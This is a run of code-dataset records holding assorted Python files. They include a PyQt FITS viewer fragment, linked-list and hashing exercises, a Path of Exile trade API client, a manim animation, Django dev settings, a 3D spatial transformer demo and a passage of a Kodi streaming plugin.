\"Flux (Relative)\")\r\n plt.show()\r\n\r\n # Prints all headers found in the file\r\n def prnthdrs(self):\r\n print (self.image_data.info())\r\n print(repr(self.image_data[0].header))\r\n\r\n # Search the headers for the text in the search box and prints entire line where its found\r\n def searchhdrs(self):\r\n print(\"\\nSearching for '\" + self.searchhdrsbox.text() + \"'\\n\")\r\n for line in repr(self.image_data[0].header).split(\"\\n\"):\r\n if (self.searchhdrsbox.text().lower()) in (line.lower()):\r\n print(line)\r\n\r\n print(\"\\nSearch finished\\n\")\r\n\r\nclass ButtonGroupBox(QWidget):\r\n\r\n def __init__(self, parent=None):\r\n super(ButtonGroupBox, self).__init__(parent=parent)\r\n\r\n self.layout = QVBoxLayout(self)\r\n self.layout.setContentsMargins(0,24,0,0)\r\n self.groupBox = QGroupBox(self)\r\n self.button = QPushButton(\"FOO\", parent=self)\r\n self.layout.addWidget(self.groupBox)\r\n\r\n self.button.move(0, -4)\r\n\r\n\r\n\r\ndef main():\r\n app = QApplication(sys.argv)\r\n main = App()\r\n main.show()\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"pyqt gui.py","file_name":"pyqt gui.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"535568581","text":"# delete node from starting in doubly linked list\n\nclass Node:\n def __init__(self, data = None):\n self.prev = None\n self.next = None\n self.data = data\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n \n def display(self):\n if self.head.data is None:\n print(\"\\nLinked List Is Empty!\")\n else:\n ptr = self.head\n\n while ptr is not None:\n print(f\"{ptr.data} -> \", end=\"\")\n ptr = ptr.next\n\n def insertPosition(self):\n position = int(input(\"\\nEnter Position : \"))\n data = int(input(\"Enter Data : \"))\n ptr = Node(data)\n\n if position is 0:\n if self.head.data is None:\n self.head.data = data\n else:\n ptr.next = self.head\n self.head.prev = ptr\n self.head = ptr\n print(\"\\nNode Inserted!\")\n else:\n flag = 0\n temp = self.head\n\n while temp.data is not None:\n if position == flag+1:\n if temp.next is None:\n temp.next = ptr\n ptr.prev = temp\n else:\n again = temp.next\n again.prev = ptr\n temp.next = ptr\n ptr.prev = temp\n ptr.next = again\n print(\"\\nNode Inserted!\")\n break\n else:\n temp = temp.next\n flag += 1\n\n def deleteBegin(self):\n if self.head.data is None:\n print(\"\\nLinked List Is Empty!\")\n else:\n if self.head.next is None:\n self.head = Node()\n else:\n self.head = self.head.next\n self.head.prev = None\n print(\"\\nNode Deleted!\")\n\n\n\nif __name__ == \"__main__\":\n linkedList = LinkedList()\n linkedList.head = Node()\n\n while True:\n choice = int(input(\"\\n1. Display\\n2. Insert Position\\n3. Delete Start\\n4. Exit\\nChoice : \"))\n \n if choice is 1:\n linkedList.display()\n elif choice is 2:\n linkedList.insertPosition()\n elif choice is 3:\n linkedList.deleteBegin()\n elif choice is 4:\n break\n else:\n print(\"\\nInvalid Input!\")","sub_path":"DoublyDeleteBegin.py","file_name":"DoublyDeleteBegin.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"19881559","text":"# Solving BOJ 15829\n\n\ndef MyHash(string, r = 31, M = 1234567891):\n total = 0\n subtractor = ord('a') - 1\n for i in range(len(string)):\n total += (ord(string[i]) - subtractor) * pow(r, i) % M\n \n return total % M\n\n\nif __name__ == '__main__':\n _ = int(input())\n print(MyHash(input()))\n","sub_path":"BOJ15829.py","file_name":"BOJ15829.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"634501848","text":"import re\n\n\ndef extractValues(sentence):\n pattern = r'[+-]?\\d+\\.?\\d+[Ee]?[+-]?\\d*'\n match = re.findall(pattern, sentence)\n return match\n\ndef getSwitches(commandline):\n pattern = r'[\\+\\\\]([a-z])\\s+([^\\s\\\\\\+]\\S*)'\n match = re.findall(pattern, commandline)\n return match\n\n\nif __name__ == '__main__':\n sentence = \"With the electron's charge being -1.6022e-19, some choices you have are -110, -32.0 and +55. Assume that po eqquails 3.1415, 'e' equals 2.7 and Na is +6.0221E+023.\"\n print(extractValues(sentence))\n commandline = \"myScript.bash +v \\i 2 +p /local/bin/somefolder \\s sss\"\n print(getSwitches(commandline))\n","sub_path":"ece364/Lab06/regexLab.py","file_name":"regexLab.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"510624324","text":"import asyncio\nimport urllib\nimport aiohttp\nfrom asyncio_throttle import Throttler\n\nfrom src.items import load_items_poeofficial\n\ncurrencies = load_items_poeofficial()\n\n\ndef name():\n return \"poeofficial\"\n\n\nclass RateLimitException(Exception):\n pass\n\n\ndef fetch_offers(league, currency_pairs, limit=3):\n loop = asyncio.get_event_loop()\n results = loop.run_until_complete(\n fetch_offers_async(league, currency_pairs, limit))\n return results\n\n\nasync def fetch_offers_async(league, currency_pairs, limit=3):\n throttler = Throttler(10)\n\n async with aiohttp.ClientSession() as sess:\n tasks = [\n asyncio.ensure_future(\n fetch_offers_for_pair(sess, throttler, league, p[0], p[1],\n limit)) for p in currency_pairs\n ]\n\n (done, _not_done) = await asyncio.wait(tasks)\n results = [task.result() for task in done]\n return results\n\n\n\"\"\"\nPrivate helpers below\n\"\"\"\n\n\nasync def fetch_offers_for_pair(sess, throttler, league, want, have, limit=5):\n async with throttler:\n offer_ids = []\n query_id = None\n offers = []\n\n offer_id_url = \"http://www.pathofexile.com/api/trade/exchange/{}\".format(\n urllib.parse.quote(league))\n payload = {\n \"exchange\": {\n \"status\": {\n \"option\": \"online\"\n },\n \"have\": [map_currency(have)],\n \"want\": [map_currency(want)],\n }\n }\n\n response = await sess.request(\"POST\", url=offer_id_url, json=payload)\n try:\n json = await response.json()\n offer_ids = json[\"result\"]\n query_id = json[\"id\"]\n except Exception:\n raise\n\n if len(offer_ids) != 0:\n id_string = \",\".join(offer_ids[:limit])\n url = \"http://www.pathofexile.com/api/trade/fetch/{}?query={}&exchange\".format(\n id_string, query_id)\n\n response = await sess.get(url)\n try:\n json = await response.json()\n offers = [map_offers_details(x) for x in json[\"result\"]]\n except Exception as ex:\n raise ex\n\n return {\"offers\": offers, \"want\": want, \"have\": have, \"league\": league}\n\n\ndef map_offers_details(offer_details):\n contact_ign = offer_details[\"listing\"][\"account\"][\"lastCharacterName\"]\n stock = offer_details[\"listing\"][\"price\"][\"item\"][\"stock\"]\n receive = offer_details[\"listing\"][\"price\"][\"item\"][\"amount\"]\n pay = offer_details[\"listing\"][\"price\"][\"exchange\"][\"amount\"]\n conversion_rate = round(receive / pay, 4)\n\n return {\n \"contact_ign\": contact_ign,\n \"conversion_rate\": conversion_rate,\n \"stock\": stock,\n }\n\n\ndef map_currency(currency):\n sanitized_currency = \"\".join(currency.split(\"'\"))\n if sanitized_currency in currencies:\n return currencies[sanitized_currency][\"id\"]\n else:\n raise Exception(\"Unknown currency key\", sanitized_currency)\n","sub_path":"src/backends/poeofficial.py","file_name":"poeofficial.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"526600439","text":"\"\"\"\nInitializes an empty persons database.\nThe persons database is used to store persons.\n\"\"\"\n\nimport sqlite3\n\nPCONN = sqlite3.connect('persons.db')\nPC = PCONN.cursor()\n\n# Here we store the mean and number (count) of each trait\n# so that we can update it over time by updating the mean\n# Example: \"Bob is friendly\" + \"Bob is unfriendly\" -> mean=0\n# person : the name of the person\n# friendliness : the mean value of friendliness traits\n# dominance : the mean value of dominance traits\n# n_friendliness : the number of friendliness traits\n# n_dominance : the number of dominance traits\nPC.execute('''\nCREATE TABLE IF NOT EXISTS persons(\nperson TEXT,\nfriendliness INT,\ndominance INT,\nn_friendliness INT,\nn_dominance INT\n)''')\n\nPCONN.commit()\n","sub_path":"interpersonal/utils/init_persons_db/init_persons.py","file_name":"init_persons.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"263651352","text":"from manimlib.imports import *\n\nclass Plot1(GraphScene):\n CONFIG = {\n \"y_max\" : 100,\n \"y_min\" : 0,\n \"x_max\" : 10,\n \"x_min\" : 0,\n # x,y 轴分别的刻度\n \"y_tick_frequency\" : 10, \n \"x_tick_frequency\" : 1, \n \"axes_color\" : BLUE, \n \"y_label_direction\": RIGHT,\n \"x_label_direction\": UP,\n # 设置图像原始位置\n \"graph_origin\": 3 * DOWN + 6 * LEFT,\n }\n # 定义本图像函数\n def func(self, x):\n return x**2\n\n def construct(self):\n self.setup_axes(animate=True)\n # 创建坐标轴和函数图像\n graph = self.get_graph(self.func, \n color = GREEN,\n x_min = 4, \n x_max = 10\n )\n # 默认label \"f(x)\" 的显示位置\n graph_label = self.get_graph_label(graph, x_val = 10, direction=UP/4)\n # \n text1 = TextMobject(\"设函数f(x)的定义域为D\")\n text1.scale(0.8)\n text1.next_to(self.coords_to_point(1, 80))\n # 第一幕\n self.play(\n \tShowCreation(graph),\n Write(graph_label),\n ShowCreation(text1),\n run_time = 2\n )\n self.wait()\n\n # 第二幕\n self.play(FadeOut(text1))\n self.wait()\n text2 = TextMobject(\"取区间I,且$I\\subset D$\")\n text2.scale(0.8)\n text2.next_to(self.coords_to_point(1, 80))\n # 画两条垂直 x 轴垂线\n v_dashed_line1 = DashedLine(start=self.coords_to_point(4, 0), \n end=self.coords_to_point(4, 16), color=BLUE)\n v_dashed_line2 = DashedLine(start=self.coords_to_point(9, 0), \n end=self.coords_to_point(9, 81), color=BLUE)\n VGroup2 = VGroup(v_dashed_line1, v_dashed_line2)\n # 截取图像范围\n graph2 = self.get_graph(func=self.func, x_min=4, x_max=9, color=RED)\n self.play(\n ShowCreation(text2),\n ShowCreation(graph2),\n ShowCreation(VGroup2),\n run_time = 2\n )\n\n # 第三幕\n self.play(\n FadeOut(text2),\n FadeOut(VGroup2),\n )\n self.wait()\n text3 = TextMobject(\"任取$x_1$和$x_2\\subset I$,且$x_1f(x_2)$\", \"则$f(x)$在区间I上单调递减\")\n text3.scale(0.8)\n text3[0].next_to(self.coords_to_point(5, 80))\n text3[1].next_to(self.coords_to_point(5, 80))\n self.wait(3)\n self.play(Write(text3[0]))\n self.wait(3)\n self.play(FadeOut(text3[0]))\n self.wait()\n self.play(Write(text3[1]))\n self.wait(4)\n\nclass Question(Scene):\n def construct(self):\n text1 = TextMobject(\"Q:怎么证明一个函数在某个区间的单调性?\", height=8, width=8)\n text2 = TexMobject(\"Example:\", \"y\", \"=\", \"x\", \"+\",\n \"\\\\ln{x}\", \",\", \"x\\\\in \\\\left(0,+\\\\infty \\\\right)\")\n text3 = TextMobject(\"证明:\")\n text4 = TextMobject(\"在$(0,+\\\\infty \\\\right)$任取$x_1$和$x_2$,且$x_1\\n\")\n header.write(\"#include \\n\\n\")\n header.write(\"namespace aoc\" + year + \"{ \")\n #Create main.cpp\n with open(dirName + '/main.cpp', 'w') as main:\n main.write(mainTemplate.replace(\"YEAR\", year))\n #Create daily files\n for i in range(25):\n header.write(declarationTemplate.replace(\"DAY\", str(i + 1)).replace(\"YEAR\", year))\n #Create implementation files\n writeImpl(dirName, str(i + 1), implementationTemplate, year)\n sources += \"\\tday\" + str(i + 1) + '.cpp\\n'\n \n #Create input files\n with open(dirName + '/inputs/day' + str(i + 1) + \".txt\", 'w') as day:\n day.write(\"\")\n header.write(\"} // aoc\" + year + '\\n')\n \n #Create CMakeLists\n with open(dirName + '/CMakeLists.txt', 'w') as cmake:\n cmake.write(cmakeTemplate.replace(\"SOURCES\", sources).replace(\"YEAR\", year))\n \n #Create README\n with open(dirName + '/README.md', 'w') as readme:\n readme.write(readmeTemplate.replace(\"YEAR\", year))","sub_path":"cpp/generator/year_genv2.py","file_name":"year_genv2.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"548847318","text":"# Copyright (c) 2020, Manfred Moitzi\n# License: MIT License\nimport pytest\nfrom ezdxf.layouts import VirtualLayout\nfrom ezdxf.render import make_path\n\n\n@pytest.fixture\ndef ellipse():\n layout = VirtualLayout()\n return layout.add_ellipse(\n center=(1999.488177113287, -1598.02265357955, 0.0),\n major_axis=(629.968069297, 0.0, 0.0),\n ratio=0.495263197,\n start_param=-1.261396328799999,\n end_param=-0.2505454928,\n dxfattribs={\n 'layer': \"0\",\n 'linetype': \"Continuous\",\n 'color': 3,\n 'extrusion': (0.0, 0.0, -1.0),\n },\n )\n\n\ndef test_end_points(ellipse):\n p = make_path(ellipse)\n\n assert ellipse.start_point.isclose(p.start)\n assert ellipse.end_point.isclose(p.end)\n\n # end point locations measured in BricsCAD:\n assert ellipse.start_point.isclose((2191.3054, -1300.8375), abs_tol=1e-4)\n assert ellipse.end_point.isclose((2609.7870, -1520.6677), abs_tol=1e-4)\n","sub_path":"tests/test_07_render/test_708b_path_from_ellipse_issue_224.py","file_name":"test_708b_path_from_ellipse_issue_224.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"91731962","text":"from Exercice2.optimized_game import OptimizedGame\nfrom game import Game\n\n\nif __name__ == '__main__':\n menu = True\n print(\"-------------------------------- Jeu de NIM --------------------------------\\n\")\n while menu:\n nombreJetons = int(input(\"Veuillez saisir le nombre de jetons (Max. 18 jetons): \"))\n playerOption = input(\"Veuillez choisir le joueur à jouer le premier: Max (o) ou Min (n): \")\n player = True if playerOption == \"o\" else False\n choice = input(\"Veuillez un algorithme: Minimax (m) ou Minimax avec élagage (e): \")\n if choice == \"m\":\n game = Game([nombreJetons], player)\n game.__repr__()\n score = game.minmax()\n print(f\"\\nLe score final est {score} avec {Game.visited_node} noeuds visités.\")\n menu = False\n elif choice == \"e\":\n optimized_game = OptimizedGame([nombreJetons], player)\n optimized_game.__repr__()\n score = optimized_game.minmax()\n print(f\"\\nLe score final est {score} avec {OptimizedGame.visited_node} noeuds visités.\")\n menu = False\n print(f\"\\nNB: Score -1 => Min a gagné // Score 1 => Max a gagné\")\n\n","sub_path":"Exercice1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"591429328","text":"# Copyright 2018 Ruben Decrop\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nprint('loading local settings in dev environment')\n\nimport os\n\n# config parameters\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(BASE_DIR)\n\nALLOWED_HOSTS = ['*']\n\nCORS_ORIGIN_ALLOW_ALL = True\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'ck.db',\n },\n}\n\nDEBUG = True\n\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 1025\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'frotend', 'dist', 'static'),\n)\n\nWEBPACK_LOADER = {\n 'DEFAULT': {\n 'BUNDLE_DIR_NAME': 'static/',\n 'STATS_FILE': os.path.join(ROOT_DIR, 'frontend', 'webpack-stats.json'),\n }\n}\n\n\n","sub_path":"setupdata/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"38362173","text":"import sys\nimport random\n\n#datafile = sys.argv[1]\n#f = open(datafile)\nf =open(\"/Users/pavanghuge/Downloads/ML/Assignment8/ionosphere.data\")\ndata = []\ni = 0\nl = f.readline()\n\n# Read Datafile\n\nwhile (l != ''):\n\ta = l.split()\n\tl2 = []\n\tfor j in range(0, len(a), 1):\n\t\tl2.append(float(a[j]))\n\tdata.append(l2)\n\tl = f.readline()\n\nrows = len(data)\ncols = len(data[0])\nf.close()\n\ntry:\n\tk = int(input(\"Enter the number of clusters: \"))\nexcept IndexError:\n\tprint(\" Improper Syntax: try - python3 Assignment8_Pavan_Ghuge.py datafile 2 {value of k>1}\")\n\tsys.exit()\n\n#initialize coordinates in means\n # number of dimensions is equal to number of coordinates of mean\n \nmean = []\ncol = []\nfor j in range(0, cols, 1):\n\tcol.append(0)\n\n# k cluster will have k means\nfor i in range(0, k, 1):\n\tmean.append(col)\n\n# Initially dividing dataset into k clusters randomnly \nrandom1 = 0\nfor p in range(0, k, 1):\n\trandom1=random.randrange(0,(rows-1))\n\tmean[p] = data[random1]\n\n#classifying points\n\ncluster = {}\ndiff = 1\n\nprev = [[0]*cols for x in range(k)]\n\ndist, n , mean_dist =[],[],[]\n\nfor p in range(0, k, 1):\n\tmean_dist.append(0)\n\tdist.append(0.1)\n\tn.append(0.1)\n\n\ntotal_dist =1\nclasses=[]\n\nwhile ((total_dist) > 0):\n\tfor i in range(0,rows, 1):\n\t\tdist =[]\n\n\t\tfor p in range(0, k, 1):\n\t\t\tdist.append(0)\n\t\tfor p in range(0, k, 1):\n\t\t\tfor j in range(0, cols, 1):\n\t\t\t\tdist[p] += ((data[i][j] - mean[p][j])**2)\n\t\tfor p in range(0, k, 1):\n\t\t\tdist[p] = (dist[p])**0.5\n\t\tminimum_dist = 0\n\t\tminimum_dist = min(dist)\n \n\t\tfor p in range(0, k, 1):\n\t\t\tif(dist[p]==minimum_dist):\n\t\t\t\tcluster[i] = p \n\t\t\t\tn[p]+=1 \n\t\t\t\tbreak\n \n # compute means\n\n\tmean = [[0]*cols for x in range(k)]\n\tcol = [] \n\n\tfor i in range(0, rows, 1):\n\t\tfor p in range(0, k, 1):\n \n\t\t\tif(cluster.get(i) == p):\n\t\t\t\tfor j in range(0, cols, 1): \n\t\t\t\t\ttemp = mean[p][j]\n\t\t\t\t\ttemp1 = data[i][j]\n\t\t\t\t\tmean[p][j] = temp + temp1 \n \n\tfor j in range(0, cols, 1):\n\t\tfor i in range(0, k, 1):\n\t\t\tmean[i][j] = mean[i][j]/n[i]\n\n\tclasses = [int(x) for x in n]\n\tn=[0.1]*k \n \n #compute distance\n\n\tmean_dist = []\n\tfor p in range(0, k, 1):\n\t\tmean_dist.append(0)\n\tfor p in range(0, k, 1):\n\t\tfor j in range(0, cols, 1):\n\t\t\tmean_dist[p]+=float((prev[p][j]-mean[p][j])**2)\n\n\t\tmean_dist[p] = (mean_dist[p])**0.5\n \n\tprev=mean\n\ttotal_dist = 0\n\tfor b in range(0,len(mean_dist),1):\n\t\ttotal_dist += mean_dist[b]\n\n#\tprint (\"the distance between means:\",totaldist)\nprint(\" Number of Data points in\",k,\" clusters are\",classes)\n\n#clustering of unclustered data\n#cluster\nfor i in range(0,rows, 1):\n\tprint(cluster[i],i)\n","sub_path":"Assignment8/Assignment8_Pavan_Ghuge.py","file_name":"Assignment8_Pavan_Ghuge.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"23812033","text":"from scipy import ndimage \nimport tensorflow as tf\nfrom spatial_transformer import AffineVolumeTransformer\nimport numpy as np\nimport scipy.misc\nimport binvox_rw\nimport sys\n\ndef read_binvox(f):\n class Model:\n pass\n\n model = Model()\n\n line = f.readline().strip()\n if not line.startswith(b'#binvox'):\n raise IOError('Not a binvox file')\n\n model.dims = list(map(int, f.readline().strip().split(b' ')[1:]))\n model.translate = list(map(float, f.readline().strip().split(b' ')[1:]))\n model.scale = float(f.readline().strip().split(b' ')[1])\n\n _ = f.readline()\n raw_data = np.frombuffer(f.read(), dtype=np.uint8)\n values, counts = raw_data[::2], raw_data[1::2]\n\n # xzy (binvox) -> zyx (tensorflow)\n model.data = np.transpose(np.repeat(values, counts).astype(np.bool).reshape(model.dims), (1,2,0))\n\n # zxy -> zyx (should all be equal, so doesn't matter)\n model.dims = [model.dims[i] for i in [0,2,1]]\n return model\n\ndef write_binvox(model, f):\n f.write(b'#binvox 1\\n')\n f.write(('dim '+' '.join(map(str, [model.dims[i] for i in [0,2,1]]))+'\\n').encode())\n f.write(('translate '+' '.join(map(str, model.translate))+'\\n').encode())\n f.write(('scale'+str(model.scale)+'\\n').encode())\n f.write(b'data\\n')\n\n # zyx (tensorflow) -> xzy (binvox)\n voxels = np.transpose(model.data, (2, 0, 1)).flatten()\n\n # run length encoding\n value = voxels[0]\n count = 0\n\n def dump():\n if sys.version_info[0] < 3:\n # python 2\n f.write(chr(value))\n f.write(chr(count))\n else:\n # python 3\n f.write(bytes((value,)))\n f.write(bytes((count,)))\n\n for curval in voxels:\n if curval==value:\n count += 1\n if count==255:\n dump()\n count = 0\n else:\n dump()\n value = curval\n count = 1\n if count > 0:\n dump()\n\n\n# Input image retrieved from:\n# https://raw.githubusercontent.com/skaae/transformer_network/master/cat.jpg\nwith open('data/model.binvox', 'rb') as f:\n model = read_binvox(f)\n\nvol = model.data.copy().astype(np.float32)\npad_size = 12\nvol = np.pad(vol, pad_width=[[pad_size,pad_size], [pad_size,pad_size], [pad_size,pad_size]], mode='constant')\nmodel.dims = (np.array(model.dims) + 2*pad_size).tolist()\n\n# input batch\nbatch_size = 3\nbatch = np.expand_dims(vol, axis=3)\nbatch = np.expand_dims(batch, axis=0)\nbatch = np.tile(batch, [batch_size, 1, 1, 1, 1])\n\n# input placeholder\n# depth, height, width, in_channels\nx = tf.placeholder(tf.float32, [batch_size, vol.shape[0], vol.shape[1], vol.shape[2], 1])\n\noutsize = (int(vol.shape[0]), int(vol.shape[1]), int(vol.shape[2]))\n\n# Affine Transformation Layer\nstl = AffineVolumeTransformer(outsize)\ntheta = tf.placeholder(tf.float32, [batch_size, stl.param_dim])\n\n# Identity transformation parameters\ninitial = np.array([1.0, 0.0, 0.0, 0.0,\n 0.0, 1.0, 0.0, 0.0,\n 0.0, 0.0, 1.0, 0.0 ]).astype('float32')\ninitial = np.reshape(initial, [1, stl.param_dim])\n\n# x-axis-rot, y-axis-rot, z-axis-rot\ndef transmat(phi, theta, psi, shiftmat=None):\n batch_size = phi.shape[0]\n assert batch_size==theta.shape[0] and batch_size==psi.shape[0], 'must have same number of angles for x,y and z axii'\n assert phi.ndim==1 and theta.ndim==1 and psi.ndim==1, 'must be 1 dimensional array'\n\n if shiftmat is None:\n shiftmat = np.zeros([batch_size,3,1])\n\n rotmat = np.zeros([batch_size, 3,3])\n rotmat[:,0,0] = np.cos(theta)*np.cos(psi)\n rotmat[:,0,1] = np.cos(phi)*np.sin(psi) + np.sin(phi)*np.sin(theta)*np.cos(psi)\n rotmat[:,0,2] = np.sin(phi)*np.sin(psi) - np.cos(phi)*np.sin(theta)*np.cos(psi)\n rotmat[:,1,0] = -np.cos(theta)*np.sin(psi)\n rotmat[:,1,1] = np.cos(phi)*np.cos(psi) - np.sin(phi)*np.sin(theta)*np.sin(psi)\n rotmat[:,1,2] = np.sin(phi)*np.cos(psi) + np.cos(phi)*np.sin(theta)*np.sin(psi)\n rotmat[:,2,0] = np.sin(theta)\n rotmat[:,2,1] = -np.sin(phi)*np.cos(theta)\n rotmat[:,2,2] = np.cos(phi)*np.cos(theta)\n\n transmat = np.concatenate([rotmat, shiftmat],2)\n return np.reshape(transmat, [batch_size, -1]).astype(np.float32)\n\n\n# Run session\nwith tf.Session(config=tf.ConfigProto(device_count={'GPU':0})) as sess:\n with tf.device(\"/cpu:0\"):\n with tf.variable_scope('spatial_transformer') as scope:\n random_angles = np.pi*(2*(np.random.rand(batch_size,3)-0.5))\n shifts = (np.random.rand(batch_size,3,1)-0.5)\n theta_random = transmat(random_angles[:,0], random_angles[:,1], random_angles[:,2], shifts)\n\n transformed = stl.transform(x, theta)\n\n sess.run(tf.global_variables_initializer())\n x_random = sess.run(transformed, feed_dict={x: batch, theta: theta_random})\n\n\nclass Model:\n pass\nmodel = Model()\n\nfor i in range(batch_size):\n cur_vol = x_random[i,:,:,:,0]>0.5 # binary\n\n model.dims = list(cur_vol.shape)\n model.data = cur_vol\n model.translate = [0,0,0]\n model.scale = 1.0\n\n #print(model.dims)\n #print(model.translate)\n #print(model.scale)\n #print(model.axis_order)\n\n with open('model_' + str(i) + 'random.binvox', 'wb') as f:\n write_binvox(model, f)\n\n\n","sub_path":"example_3daffine.py","file_name":"example_3daffine.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"13258295","text":"import time\nimport codecs\nfrom xml.sax.saxutils import escape\nfrom xml.dom.minidom import parseString\n\nimport arrow\nfrom kodi_six import xbmc\n\nfrom slyguy import plugin, gui, settings, userdata, signals, inputstream\nfrom slyguy.exceptions import PluginError\n\nfrom .api import API\nfrom .language import _\nfrom .constants import *\n\napi = API()\nconfig = Config()\n\n@signals.on(signals.BEFORE_DISPATCH)\ndef before_dispatch():\n config.load()\n api.new_session(config)\n plugin.logged_in = api.logged_in\n\n@plugin.route('')\ndef home(**kwargs):\n folder = plugin.Folder(cacheToDisc=False)\n\n if not api.logged_in:\n folder.add_item(label=_(_.LOGIN, _bold=True), path=plugin.url_for(login))\n else:\n if config.has_featured:\n folder.add_item(label=_(_.FEATURED, _bold=True), path=plugin.url_for(featured))\n\n folder.add_item(label=_(_.SHOWS, _bold=True), path=plugin.url_for(shows))\n folder.add_item(label=_(_.MOVIES, _bold=True), path=plugin.url_for(movies))\n\n if config.has_live_tv:\n folder.add_item(label=_(_.LIVE_TV, _bold=True), path=plugin.url_for(live_tv))\n\n # folder.add_item(label=_(_.BRANDS, _bold=True), path=plugin.url_for(brands))\n # folder.add_item(label=_(_.NEWS, _bold=True), path=plugin.url_for(news))\n folder.add_item(label=_(_.SEARCH, _bold=True), path=plugin.url_for(search))\n\n if settings.getBool('bookmarks', True):\n folder.add_item(label=_(_.BOOKMARKS, _bold=True), path=plugin.url_for(plugin.ROUTE_BOOKMARKS), bookmark=False)\n\n folder.add_item(label=_.SELECT_PROFILE, path=plugin.url_for(select_profile), art={'thumb': config.image(userdata.get('profile_img'))}, info={'plot': userdata.get('profile_name')}, _kiosk=False, bookmark=False)\n folder.add_item(label=_.LOGOUT, path=plugin.url_for(logout), _kiosk=False, bookmark=False)\n\n folder.add_item(label=_.SETTINGS, path=plugin.url_for(plugin.ROUTE_SETTINGS), _kiosk=False, bookmark=False)\n\n return folder\n\n@plugin.route()\ndef featured(slug=None, **kwargs):\n folder = plugin.Folder(_.FEATURED)\n\n for row in api.featured():\n if row['model'] not in ('show', 'movie'):\n continue\n\n if slug is None:\n folder.add_item(\n label = row['title'],\n path = plugin.url_for(featured, slug=row['apiParams']['name']),\n )\n continue\n\n if slug != row['apiParams']['name']:\n continue\n\n for row in api.carousel(row['apiBaseUrl'], params=row['apiParams']):\n if row.get('showId'):\n folder.add_item(\n label = row['showTitle'],\n info = {\n 'plot': row['about'],\n 'mediatype': 'tvshow',\n },\n art = {'thumb': config.image(row['showAssets']['filepath_show_browse_poster']), 'fanart': config.image(row['showAssets']['filepath_brand_hero'], 'w1920-q80')},\n path = plugin.url_for(show, show_id=row['showId']),\n )\n\n elif row.get('movieContent'):\n data = row['movieContent']\n folder.add_item(\n label = data['label'].strip() or data['title'].strip(),\n info = {\n 'plot': data.get('shortDescription', data['description']),\n 'aired': data['_airDateISO'],\n 'dateadded': data['_pubDateISO'],\n 'genre': data['genre'],\n 'duration': data['duration'],\n 'mediatype': 'movie',\n 'trailer': plugin.url_for(play, video_id=row['trailerContentId']) if row.get('trailerContentId') else None,\n },\n art = {'thumb': _get_thumb(data['thumbnailSet']), 'fanart': _get_thumb(data['thumbnailSet'], 'Thumbnail')},\n path = plugin.url_for(play, video_id=data['contentId']),\n playable = True,\n )\n\n break\n\n return folder\n\n@plugin.route()\ndef movies(genre=None, title=None, page=1, **kwargs):\n folder = plugin.Folder(title or _.MOVIES)\n page = int(page)\n num_results = 50\n\n if genre is None:\n folder.add_item(\n label = _.POPULAR,\n path = plugin.url_for(movies, genre='popular', title=_.POPULAR),\n )\n\n folder.add_item(\n label = _.A_Z,\n path = plugin.url_for(movies, genre='', title=_.A_Z),\n )\n\n for row in api.movie_genres():\n if row['slug'] in ('popular', 'a-z'):\n continue\n\n folder.add_item(\n label = row['title'],\n path = plugin.url_for(movies, genre=row['slug'], title=row['title']),\n )\n\n return folder\n\n if genre == 'popular':\n data = api.trending_movies()\n data['movies'] = [x['content'] for x in data['trending'] if x['content_type'] == 'movie']\n data['numFound'] = len(data['movies'])\n else:\n data = api.movies(genre=genre, num_results=num_results, page=page)\n\n folder.title += ' ({})'.format(data['numFound'])\n\n for row in data['movies']:\n data = row['movieContent']\n folder.add_item(\n label = data['label'].strip() or data['title'].strip(),\n info = {\n 'plot': data.get('shortDescription', data['description']),\n 'aired': data['_airDateISO'],\n 'dateadded': data['_pubDateISO'],\n 'genre': data['genre'],\n 'duration': data['duration'],\n 'mediatype': 'movie',\n 'trailer': plugin.url_for(play, video_id=row['movie_trailer_id']) if row.get('movie_trailer_id') else None,\n },\n art = {'thumb': _get_thumb(data['thumbnailSet']), 'fanart': _get_thumb(data['thumbnailSet'], 'Thumbnail')},\n path = plugin.url_for(play, video_id=data['contentId']),\n playable = True,\n )\n\n if 